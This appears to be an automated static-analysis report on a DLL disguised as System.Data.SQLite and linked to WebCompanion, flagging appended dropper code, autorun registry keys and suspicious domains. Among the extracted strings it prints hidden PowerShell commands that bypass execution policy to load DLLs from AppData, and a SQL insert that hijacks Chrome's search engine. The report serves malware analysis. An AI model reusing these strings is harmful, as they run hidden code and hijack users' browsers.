PREMIUM PESCAN.IO - Analysis Report

File Structure: analysis image not included. Legend: PE header (light blue), executable sections (pink), non-executable sections (black), external injected code (red); a red file structure marks a malformed or corrupted header. For non-PE files: printable characters (blue), non-printable characters (black).
Information
Size: 925,63 KB
SHA-256 Hash: 014CDD4423EC219A119B542710C3D6A10D39747C9DED474D0F62B85215A08B31
SHA-1 Hash: 00E213992DB56C2399F1A22E1CB8FE2D3EDDCC02
MD5 Hash: E4E07A795A478E598C29B5F9A000CA73
Imphash: DAE02F32A21E03CE65412F6E56942DAA
MajorOSVersion: 4
MinorOSVersion: 0
CheckSum: 00055768
EntryPoint (rva): 42E7E
SizeOfHeaders: 1000
SizeOfImage: 48000
ImageBase: 400000
Architecture: x86
ImportTable: 42E30
IAT: 2000
Characteristics: 2102
TimeDateStamp: 532A03EF
Date: 19/03/2014 20:54:07
File Type: DLL
Number Of Sections: 3
ASLR: Enabled
Section Names: .text, .rsrc, .reloc
Number Of Executable Sections: 1
Subsystem: Windows Console

Sections Info
Section  Flags       Characteristics                          ROffset  RSize  VOffset  VSize  Entropy  Chi2
.text    0x60000020  Code, Executable, Readable               1000     41000  2000     40E84  5.9825   3923556.17
.rsrc    0x40000040  Initialized Data, Readable               42000    1000   44000    420    1.0833   830322.5
.reloc   0x42000040  Initialized Data, GP-Relative, Readable  43000    1000   46000    C      0.0164   1041921.88
Description
OriginalFilename: System.Data.SQLite.dll
CompanyName: http://system.data.sqlite.org/
LegalCopyright: Public Domain
LegalTrademarks: (R) WebCompanion
ProductName: System.Data.SQLite
FileVersion: 1.0.92.0
FileDescription: System.Data.SQLite Core
ProductVersion: 1.0.92.0
Comments: ADO.NET Data Provider for SQLite
Language: Unknown (ID=0x0)
CodePage: Unicode (UTF-16 LE) (0x4B0)

Binder/Joiner/Crypter
Dropper code detected (EOF) - 637,63 KB

Entry Point
Section 1 (.text) contains the Entry Point
Information -> EntryPoint (calculated) - 41E7E
Code -> FF25002040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Assembler
|JMP DWORD PTR [0X402000]
|ADD BYTE PTR [EAX], AL (repeated 22 times: the remaining bytes shown above are 00 00 padding)
Signatures
CheckSum Integrity Problem:
Header: 350056
Calculated: 1003996
Certificate - Digital Signature:
• The file is not signed

Packer/Compiler
Compiler: Microsoft Visual .NET - (You can use a decompiler for this...)
AnyCPU: True
Version: v2.0
Compiler: Microsoft Visual Studio
Detect It Easy (die)
PE: Protector: Eziriz .NET Reactor(6.x.x.x)[By Dr.FarFar]
PE: library: .NET(v2.0.50727)[-]
PE: linker: Microsoft Linker(8.0)[-]
PE: Sign tool: Windows Authenticode(2.0)[PKCS 7]
Entropy: 5.62325

Windows REG (UNICODE)
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Blaze Media Inc\Secure Browser\
SOFTWARE\BlazeMedia\Update\Clients\
SOFTWARE\Clients\StartMenuInternet
SOFTWARE\Clients\startmenuinternet\
Software\Microsoft\
Software\Google\
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
SOFTWARE\WOW6432Node\Clients\StartMenuInternet
SOFTWARE\Microsoft\Windows NT\CurrentVersion1
Rebuilt string - SOFTWARE\Policies\Microsoft\Windows\System
Rebuilt string - SOFTWARE\Microsoft\Windows\CurrentVersion\Run

File Access
mscoree.dll
MozCompressor.dll
SQLite.Interop.dll
WebCompanion.Lib.Newtonsoft.Json.dll
WebCompanion.Merged.dll
WebCompanion.Lib.ICSharpCode.SharpZipLib.dll
WebCompanion.Lib.LZ4.dll
user32.dll
kernel32.dll
advapi32.dll
System.Data.SQLite.dll
ICSharpCode.SharpZipLib.Zip
Temp
AppData

File Access (UNICODE)
System.Dat
DbProviderServices, System.Dat
Objects.Dat
Interop.dll
SQLite.dll
WebCompanion.dll
/edge/x86/node.exe
0\powershell.exe
?StandardFilesRestorer.Exe
launcher.exe
chrome.exe
firefox.exe
iexplore.exe
TaskScheduler.Exe
updater.exe
\BBWC\S10.dll
Updater10.dll
CSharp.dll
Wdownlevel\api-ms-win-crt-runtime-l1-1-0.dll
Capi-ms-win-crt-runtime-l1-1-0.dll
!intermediate.dat
version.dat
TaskScheduler.Log
.log\app.log
Recover.txt
ProfileInfo.txt
EventConfig.txt
SearchData.txt
!SearchConfig.zip
Exec - powershell.exe sC:\Windows\System32\WindowsPowerShell\v1.0\
Exec - powershell.exe 3SetupUpdaterScheduledTask
Temp
ProgramFiles
AppData

SQL Queries
PRAGMA [{0}].table_info([{1}])
SELECT {0} FROM [{1}].[{2}] WHERE ROWID = ?
Select * From Win32_Process Where ProcessID =
SELECT CommandLine FROM Win32_Process WHERE ProcessId =
SELECT * FROM Win32_OperatingSystem
SELECT count(*) FROM keywords WHERE short_name='Chrome Search'
SELECT * FROM [{0}].[{1}]
SELECT * FROM [{0}].[{1}] WHERE [type] LIKE 'table' OR [type] LIKE 'view'
SELECT * FROM [{0}].[{2}] WHERE [type] LIKE 'index' AND [name] LIKE '{1}'
SELECT * FROM [{0}].[{1}] WHERE [type] LIKE 'table'
SELECT [type], [name], [tbl_name], [rootpage], [sql], [rowid] FROM [{0}].[{1}] WHERE [type] LIKE 'trigger'
SELECT [type], [name], [tbl_name], [rootpage], [sql], [rowid] FROM [{0}].[{1}] WHERE [type] LIKE 'table'
SELECT * FROM [{0}].[{1}] WHERE [type] LIKE 'view'
SELECT * FROM [{0}].[{2}] WHERE [type] LIKE 'index' AND [tbl_name] LIKE '{1}'
CREATE TABLE {0}(x);

Words of Interest
zombie
Encrypt
Decrypt
Encryption
PassWord
<meta
exec
createobject
unescape
attrib
start
cipher
hostname
shutdown
systeminfo
ping
expand
replace

Words of Interest (UNICODE)
taskkill
Encrypt
Decrypt
Encryption
PassWord
exec
powershell
taskkill
attrib
start
shutdown
ping
expand
replace

URLs
http://system.data.sqlite.org/
http://ocsp.entrust.net00
http://crl.entrust.net/g2ca.crl
http://www.entrust.net/rpa0
http://ocsp.entrust.net05
http://aia.entrust.net/evcs1-chain256.cer
http://crl.entrust.net/evcs1.crl
http://www.digicert.com/CPS0
http://crl3.digicert.com/sha2-assured-ts.crl
http://crl4.digicert.com/sha2-assured-ts.crl
http://ocsp.digicert.com
http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt
http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl
http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
http://crl3.digicert.com/DigiCertTrustedRootG4.crl
http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
http://www.digicert.com/CPS0
http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
https://www.entrust.net/rpa0
https://www.digicert.com/CPS0

URLs (UNICODE)
http://system.data.sqlite.org/
http://dkf201.com
http://wzp9182.com
http://d2vtta4ibs40qt.cloudfront.net
http://api.bing.com/osjson.aspx?query={searchTerms}
http://www.mozilla.org/2006/browser/search/
http://api.bing.com/osjson.aspx?query={searchTerms}', 20, '
http://rt.webcompanion.com/notifications/download/rt/searchenginetemplate.xml
http://www.w3.org/2000/xmlns/
http://james.newtonking.com/projects/json
https://{0}?{1}
https://www.{0}/favicon.ico
https://www.search-get.com/favicon.ico', '
https://search-get.com/wc/search?q={searchTerms}&src=chrome', 1, '', 'UTF-8', 'http://api.bing.com/osjson.aspx?query={searchTerms}', 20, '

Emails
robert@blackcastlesoft.com

IP Addresses
1.0.92.0
15.0.0.0

Strings/Hex Code Found With The File Rules
Rule Type    Encoding     Matched (Word)
Text         Unicode      Unicode escape - \u00 - (Common Unicode escape sequences)
Text         Ascii        WinAPI Sockets (bind)
Text         Unicode      WinAPI Sockets (bind)
Text         Ascii        WinAPI Sockets (connect)
Text         Unicode      WinAPI Sockets (connect)
Text         Ascii        WinAPI Sockets (send)
Text         Ascii        Registry (RegOpenKeyEx)
Text         Ascii        File (GetTempPath)
Text         Ascii        File (CreateFile)
Text         Ascii        Encryption (Base64Encode)
Text         Ascii        Encryption (Blowfish)
Text         Ascii        Encryption (CipherMode)
Text         Ascii        Encryption (CreateDecryptor)
Text         Ascii        Encryption (CryptoStream)
Text         Ascii        Encryption (CryptoStreamMode)
Text         Ascii        Encryption (DotfuscatorAttribute)
Text         Ascii        Encryption (FromBase64String)
Text         Ascii        Encryption (ICryptoTransform)
Text         Ascii        Encryption (MD5CryptoServiceProvider)
Text         Ascii        Encryption (RNGCryptoServiceProvider)
Text         Ascii        Encryption (Rijndael)
Text         Ascii        Encryption (RijndaelManaged)
Text         Ascii        Encryption (ToBase64String)
Text         Ascii        Encryption (Twofish)
Text         Ascii        Anti-Analysis VM (GetVersion)
Text         Ascii        Execution (ShellExecute)
Text         Unicode      Software that records user activity (Logger)
Text         Ascii        Malicious rerouting of traffic to an attacker-controlled site (Redirect)
Entry Point  Hex Pattern  Microsoft Visual C / Basic .NET
Entry Point  Hex Pattern  Microsoft Visual C++ 8
Entry Point  Hex Pattern  Microsoft Visual C++ 8.0
Entry Point  Hex Pattern  Microsoft Visual C v7.0 / Basic .NET
Entry Point  Hex Pattern  Microsoft Visual Studio .NET
Entry Point  Hex Pattern  .NET executable
Entry Point  Hex Pattern  TrueVision Targa Graphics format
Resources
Path          DataRVA  Size  FileOffset
\VERSION\1\0  44058    3C8   42058
Code: C80334000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE000001000000
Text: ..4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...............
Intelligent String
• WebCompanion.dll
• http://james.newtonking.com/projects/json
• 1.0.92.0
• _CorDllMainmscoree.dll
• .dll
• -r.psj
• .psj
• c:\dev\sqlite\dotnet\obj\2008\Release\System.Data.SQLite.pdb
• BrQt
• I0G08
• updater.exe
• .log\app.log
• http://dkf201.com
• http://wzp9182.com
• http://d2vtta4ibs40qt.cloudfront.net
• SearchData.txt
• Capi-ms-win-crt-runtime-l1-1-0.dll
• Wdownlevel\api-ms-win-crt-runtime-l1-1-0.dll
• version.dat
• !intermediate.dat
• \u0085
• -WindowStyle Hidden -ExecutionPolicy bypass -c "& ./edge/x86/node.exe ./edge/update.js --delay=350;$w="$env:APPDATA"+'\BBWC\';$f='Updater10.dll';if(Test-Path -Path $f){[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+$f));$i=new-object u.U;$i.ST()}"
• -WindowStyle Hidden -ExecutionPolicy bypass -c "& ./edge/x86/node.exe ./edge/update.js --delay=900"
• C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
• -WindowStyle Hidden -ExecutionPolicy bypass -c "$f="$env:APPDATA"+'\BBWC\S10.dll';if(Test-Path -Path $f){[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+$f));[E.S]::A('b')}else{& ./edge/x86/node.exe ./edge/startup.js}"
• -WindowStyle Hidden -ExecutionPolicy bypass -c "& ./edge/x86/node.exe ./edge/startup.js"
• .tmp
• http://api.bing.com/osjson.aspx?query={searchTerms}
• https://www.{0}/favicon.ico
• iexplore.exe
• firefox.exe
• chrome.exe
• launcher.exe
• .exe
• ) insert into keywords ( short_name,keyword, favicon_url, url, safe_for_autoreplace, originating_url, input_encodings, suggest_url, prepopulate_id, sync_guid, alternate_urls, image_url, search_url_post_params, suggest_url_post_params, image_url_post_params, new_tab_url) VALUES ('Chrome Search', 'Chrome Search', 'https://www.search-get.com/favicon.ico', 'https://search-get.com/wc/search?q={searchTerms}&src=chrome', 1, '', 'UTF-8', 'http://api.bing.com/osjson.aspx?query={searchTerms}', 20, '
• bing.com
• %mysearchengine.xml
• .xml
• http://rt.webcompanion.com/notifications/download/rt/searchenginetemplate.xml
• EventConfig.txt
• ProfileInfo.txt
• Recover.txt
• !SearchConfig.zip
• 1searchenginetemplate.xml
• {0}.{1}{2}.tmp
• themes/alert-icon.svg
• webcompaionreimageicon.ico
• webcompanionicon.ico
• webcompanionicon_pro.ico
• Z:\Documents\bidmonitor\web-companion\WebCompanion\bin\Release\Dotfuscated\WebCompanion.Merged.pdb

Flow Anomalies
Offset  RVA       Section    Description
206DC   A25ED     .text      JMP [static] | Indirect jump to absolute memory address
41E7E   402000    .text      JMP [static] | Indirect jump to absolute memory address
60C94   4D20000   *padding*  JMP [static] | Indirect jump to absolute memory address
71435   4D20000   *padding*  CALL [static] | Indirect call to absolute memory address
71AE0   165714    *padding*  CALL [static] | Indirect call to absolute memory address
8E0E4   6890000   *padding*  JMP [static] | Indirect jump to absolute memory address
9FB2A   2051D     *padding*  CALL [static] | Indirect call to absolute memory address
E408E   402000    *padding*  JMP [static] | Indirect jump to absolute memory address
E6C80   2C279963  *padding*  JMP [static] | Indirect jump to absolute memory address
44000   N/A       *Overlay*  B01F00000002020030821FA006092A864886F70D | ........0.....*.H...
Extra Analysis
Metric          Value   Percentage
Ascii Code      510480  53,8571%
Null Byte Code  308110  32,5065%